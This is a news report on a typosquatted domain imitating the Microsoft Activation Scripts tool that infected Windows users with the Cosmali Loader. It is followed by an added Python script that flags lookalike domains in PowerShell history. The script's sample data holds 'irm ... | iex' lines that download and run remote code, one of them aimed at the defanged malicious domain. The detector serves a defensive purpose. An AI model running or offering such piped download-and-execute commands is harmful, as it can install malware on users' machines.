
Fake MAS Windows activation domain used to spread PowerShell malware

A typosquatted domain impersonating the Microsoft Activation Scripts (MAS) tool was used to distribute malicious PowerShell scripts that infect Windows systems with the ‘Cosmali Loader’.

BleepingComputer has found that multiple MAS users began reporting on Reddit [1, 2] yesterday that they received pop-up warnings on their systems about a Cosmali Loader infection.

You have been infected by a malware called ‘cosmali loader’ because you mistyped ‘get.activated.win’ as ‘get.activate[.]win’ when activating Windows in PowerShell.
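For defenders who want to check whether a machine fetched the lookalike instead of the real domain, the following added example (not from the article or from the MAS project) scans command lines, such as a PowerShell history file or script-block log export, for hostnames within a small edit distance of `get.activated.win`. The sample history lines are constructed, and the `find_lookalikes` helper and its distance threshold are assumptions of this example.

```python
import re

LEGIT = "get.activated.win"  # the domain the article names as the correct one
# Rough hostname matcher, with an optional scheme in front (assumption of this example).
HOST_RE = re.compile(r"(?:https?://)?((?:[a-z0-9-]+\.)+[a-z]{2,})", re.I)

def edit_distance(a, b):
    """Levenshtein distance using two-row dynamic programming."""
    prev = list(range(len(b) + 1))
    for i, ca in enumerate(a, 1):
        cur = [i]
        for j, cb in enumerate(b, 1):
            cur.append(min(prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + (ca != cb)))
        prev = cur
    return prev[-1]

def find_lookalikes(lines, legit=LEGIT, max_dist=2):
    """Return (line_no, host, distance) for hosts close to, but not equal to, legit."""
    hits = []
    for no, line in enumerate(lines, 1):
        text = line.replace("[.]", ".")  # accept defanged indicators as well
        for host in HOST_RE.findall(text):
            host = host.lower()
            dist = edit_distance(host, legit)
            if 0 < dist <= max_dist:  # distance 0 is the legitimate domain itself
                hits.append((no, host, dist))
    return hits

# Constructed sample of command history lines; the lookalike is kept defanged
# exactly as the article writes it.
SAMPLE_HISTORY = [
    "Get-ChildItem C:\\Users",
    "irm https://get.activated.win | iex",
    "irm https://get.activate[.]win | iex",
    "irm get.activate[.]win | iex",
    "Invoke-WebRequest https://example.com/file.zip -OutFile file.zip",
]

if __name__ == "__main__":
    for no, host, dist in find_lookalikes(SAMPLE_HISTORY):
        print(f"line {no}: {host} (edit distance {dist} from {LEGIT})")
```

A hit means the command line deserves review, not that the host is confirmed infected; unrelated hostnames can also fall within the threshold.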
